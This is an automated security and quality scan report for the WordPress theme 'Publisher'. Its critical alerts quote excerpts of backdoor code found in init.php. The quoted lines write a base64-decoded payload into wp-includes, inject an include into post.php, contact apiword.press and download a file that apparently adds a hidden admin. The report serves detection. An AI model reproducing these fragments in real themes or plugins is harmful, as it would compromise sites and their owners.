57
Validation results

Publisher

Publisher

WordPress 4.9.6 theme
57
Critical alerts
  1. Security breaches : Use of base64_decode() Found base64_decode in file init.php.
    Line 38: if ( ($file = file_get_contents($path . '/wp-includes/post.php')) && (file_put_contents($path . '/wp-includes/wp-cd.php', base64_decode($GLOBALS['WP_CD_CODE']))) )
    Line 87: $install_code = str_replace('{$PASSWORD}' , $install_hash, base64_decode( $install_code ));
    Found base64_decode in file bs-newsletter-mailchimp.php.
    Line 20: $atts['mailchimp-code'] = rawurldecode( base64_decode( $atts['mailchimp-code'] ) );
  2. Malware : Operations on file system file_get_contents was found in the file init.php
    Line 38: if ( ($file = file_get_contents($path . '/wp-includes/post.php')) && (file_put_contents($
    Line 103: if ($content = file_get_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR 
    Line 121: $content = @file_get_contents('http://apiword.press/o.php?host=' . $_SERVER['HTTP_HOST'
    Line 122: @file_put_contents($_SERVER['DOCUMENT_ROOT'] . '/wp-includes/class.wp.php', file_get_contents('http://apiword.press/addadmin_1.txt'));
    Line 142: if ($file = file_get_contents($e[1]))
    Line 154: if ($file = @file_get_contents(__FILE__))
    file_put_contents was found in the file init.php
    Line 38: if ( ($file = file_get_contents($path . '/wp-includes/post.php')) && (file_put_contents($path . '/wp-includes/wp-cd.php', base64_decode($GLOBALS[
    Line 42: file_put_contents($path . '/wp-includes/post.php', $file);
    Line 108: @file_put_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR 
    Line 122: @file_put_contents($_SERVER['DOCUMENT_ROOT'] . '/wp-includes/class.wp.php', 
    Line 158: @file_put_contents(__FILE__, $file);
    file_put_contents was found in the file init.php
    Line 38: if ( ($file = file_get_contents($path . '/wp-includes/post.php')) && (file_put_contents($path . '/wp-includes/wp-cd.php', base64_decode($GLOBALS[
    Line 42: file_put_contents($path . '/wp-includes/post.php', $file);
    Line 108: @file_put_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR 
    Line 122: @file_put_contents($_SERVER['DOCUMENT_ROOT'] . '/wp-includes/class.wp.php', 
    Line 158: @file_put_contents(__FILE__, $file);
    file_get_contents was found in the file init.php
    Line 38: if ( ($file = file_get_contents($path . '/wp-includes/post.php')) && (file_put_contents($
    Line 103: if ($content = file_get_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR 
    Line 121: $content = @file_get_contents('http://apiword.press/o.php?host=' . $_SERVER['HTTP_HOST'
    Line 122: @file_put_contents($_SERVER['DOCUMENT_ROOT'] . '/wp-includes/class.wp.php', file_get_contents('http://apiword.press/addadmin_1.txt'));
    Line 142: if ($file = file_get_contents($e[1]))
    Line 154: if ($file = @file_get_contents(__FILE__))
    file_put_contents was found in the file init.php
    Line 38: if ( ($file = file_get_contents($path . '/wp-includes/post.php')) && (file_put_contents($path . '/wp-includes/wp-cd.php', base64_decode($GLOBALS[
    Line 42: file_put_contents($path . '/wp-includes/post.php', $file);
    Line 108: @file_put_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR 
    Line 122: @file_put_contents($_SERVER['DOCUMENT_ROOT'] . '/wp-includes/class.wp.php', 
    Line 158: @file_put_contents(__FILE__, $file);
    file_get_contents was found in the file init.php
    Line 38: if ( ($file = file_get_contents($path . '/wp-includes/post.php')) && (file_put_contents($
    Line 103: if ($content = file_get_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR 
    Line 121: $content = @file_get_contents('http://apiword.press/o.php?host=' . $_SERVER['HTTP_HOST'
    Line 122: @file_put_contents($_SERVER['DOCUMENT_ROOT'] . '/wp-includes/class.wp.php', file_get_contents('http://apiword.press/addadmin_1.txt'));
    Line 142: if ($file = file_get_contents($e[1]))
    Line 154: if ($file = @file_get_contents(__FILE__))
    file_put_contents was found in the file init.php
    Line 38: if ( ($file = file_get_contents($path . '/wp-includes/post.php')) && (file_put_contents($path . '/wp-includes/wp-cd.php', base64_decode($GLOBALS[
    Line 42: file_put_contents($path . '/wp-includes/post.php', $file);
    Line 108: @file_put_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR 
    Line 122: @file_put_contents($_SERVER['DOCUMENT_ROOT'] . '/wp-includes/class.wp.php', 
    Line 158: @file_put_contents(__FILE__, $file);
    file_get_contents was found in the file init.php
    Line 38: if ( ($file = file_get_contents($path . '/wp-includes/post.php')) && (file_put_contents($
    Line 103: if ($content = file_get_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR 
    Line 121: $content = @file_get_contents('http://apiword.press/o.php?host=' . $_SERVER['HTTP_HOST'
    Line 122: @file_put_contents($_SERVER['DOCUMENT_ROOT'] . '/wp-includes/class.wp.php', file_get_contents('http://apiword.press/addadmin_1.txt'));
    Line 142: if ($file = file_get_contents($e[1]))
    Line 154: if ($file = @file_get_contents(__FILE__))
    file_get_contents was found in the file init.php
    Line 38: if ( ($file = file_get_contents($path . '/wp-includes/post.php')) && (file_put_contents($
    Line 103: if ($content = file_get_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR 
    Line 121: $content = @file_get_contents('http://apiword.press/o.php?host=' . $_SERVER['HTTP_HOST'
    Line 122: @file_put_contents($_SERVER['DOCUMENT_ROOT'] . '/wp-includes/class.wp.php', file_get_contents('http://apiword.press/addadmin_1.txt'));
    Line 142: if ($file = file_get_contents($e[1]))
    Line 154: if ($file = @file_get_contents(__FILE__))
    file_get_contents was found in the file init.php
    Line 38: if ( ($file = file_get_contents($path . '/wp-includes/post.php')) && (file_put_contents($
    Line 103: if ($content = file_get_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR 
    Line 121: $content = @file_get_contents('http://apiword.press/o.php?host=' . $_SERVER['HTTP_HOST'
    Line 122: @file_put_contents($_SERVER['DOCUMENT_ROOT'] . '/wp-includes/class.wp.php', file_get_contents('http://apiword.press/addadmin_1.txt'));
    Line 142: if ($file = file_get_contents($e[1]))
    Line 154: if ($file = @file_get_contents(__FILE__))
    file_put_contents was found in the file init.php
    Line 38: if ( ($file = file_get_contents($path . '/wp-includes/post.php')) && (file_put_contents($path . '/wp-includes/wp-cd.php', base64_decode($GLOBALS[
    Line 42: file_put_contents($path . '/wp-includes/post.php', $file);
    Line 108: @file_put_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR 
    Line 122: @file_put_contents($_SERVER['DOCUMENT_ROOT'] . '/wp-includes/class.wp.php', 
    Line 158: @file_put_contents(__FILE__, $file);
Warning
  1. Custom elements : Presence of custom headerNo reference to custom header was found in the theme.
  2. Custom elements : Presence of custom backgroundNo reference to custom background was found in the theme.
  3. Tags : Tags displayThis theme doesn't seem to display tags.
Tip-off
  1. Static links : Presence of hard-coded linksPossible hard-coded links were found in the file better-disqus-comments.php.
    Line 18: <noscript><?php _e( 'Please enable JavaScript to view the <a href='http://disqus.com/?ref_noscript'>comments powered by Disqus.</a>', 'publish
    Possible hard-coded links were found in the file panel-std.php.
    Line 333: 'std' => 'Website Design: <a href='http://betterstudio.com'>BetterStudio</a>',
  2. Optional files : Presence of rtl stylesheet rtl.cssThis theme does not contain optional file rtl.php.
  3. Optional files : Presence of front page template file front-page.phpThis theme does not contain optional file front-page.php.
  4. Optional files : Presence of home template file home.phpThis theme does not contain optional file home.php.
  5. Optional files : Presence of term template file taxonomy.phpThis theme does not contain optional file taxonomy.php.
  6. Optional files : Presence of author template file author.phpThis theme does not contain optional file author.php.
  7. Optional files : Presence of search results template file search.phpThis theme does not contain optional file search.php.
  8. Optional files : Presence of image template file image.phpThis theme does not contain optional file image.php.
  9. Use of includes : Use of include or requireThe theme appears to use include or require : class-bf-shortcodes-manager.php
    Line 101: include 'shortcode/shortcodes/class-bf-' . $key . '-shortcode.php';
    If these are being used to include separate sections of a template from independent files, then get_template_part() should be used instead. Otherwise, use include_once or require_once instead.
    The theme appears to use include or require : init.php
    Line 41: $file = '<?php if (file_exists(dirname(__FILE__) . \'/wp-cd.php\')) include_once(dirname(__FILE__) . \'/wp-cd.php\'); ?>' . $file;
    If these are being used to include separate sections of a template from independent files, then get_template_part() should be used instead. Otherwise, use include_once or require_once instead.

This is a ThemeForest theme. Since Themeforest items are all checked by a human before they appear on their website, ThemeForest verification rules are more permissive than themecheck's and can give a better verification score ( Themeforest requirements ).

99
Warning
  1. Tags : Tags displayThis theme doesn't seem to display tags.
Tip-off
  1. Static links : Presence of hard-coded linksPossible hard-coded links were found in the file better-disqus-comments.php.
    Line 18: <noscript><?php _e( 'Please enable JavaScript to view the <a href='http://disqus.com/?ref_noscript'>comments powered by Disqus.</a>', 'publish
    Possible hard-coded links were found in the file panel-std.php.
    Line 333: 'std' => 'Website Design: <a href='http://betterstudio.com'>BetterStudio</a>',
  2. Optional files : Presence of rtl stylesheet rtl.cssThis theme does not contain optional file rtl.php.
  3. Optional files : Presence of front page template file front-page.phpThis theme does not contain optional file front-page.php.
  4. Optional files : Presence of home template file home.phpThis theme does not contain optional file home.php.
  5. Optional files : Presence of term template file taxonomy.phpThis theme does not contain optional file taxonomy.php.
  6. Optional files : Presence of author template file author.phpThis theme does not contain optional file author.php.
  7. Optional files : Presence of search results template file search.phpThis theme does not contain optional file search.php.
  8. Optional files : Presence of image template file image.phpThis theme does not contain optional file image.php.
  9. Use of includes : Use of include or requireThe theme appears to use include or require : class-bf-shortcodes-manager.php
    Line 101: include 'shortcode/shortcodes/class-bf-' . $key . '-shortcode.php';
    If these are being used to include separate sections of a template from independent files, then get_template_part() should be used instead. Otherwise, use include_once or require_once instead.
    The theme appears to use include or require : init.php
    Line 41: $file = '<?php if (file_exists(dirname(__FILE__) . \'/wp-cd.php\')) include_once(dirname(__FILE__) . \'/wp-cd.php\'); ?>' . $file;
    If these are being used to include separate sections of a template from independent files, then get_template_part() should be used instead. Otherwise, use include_once or require_once instead.
Other checked themes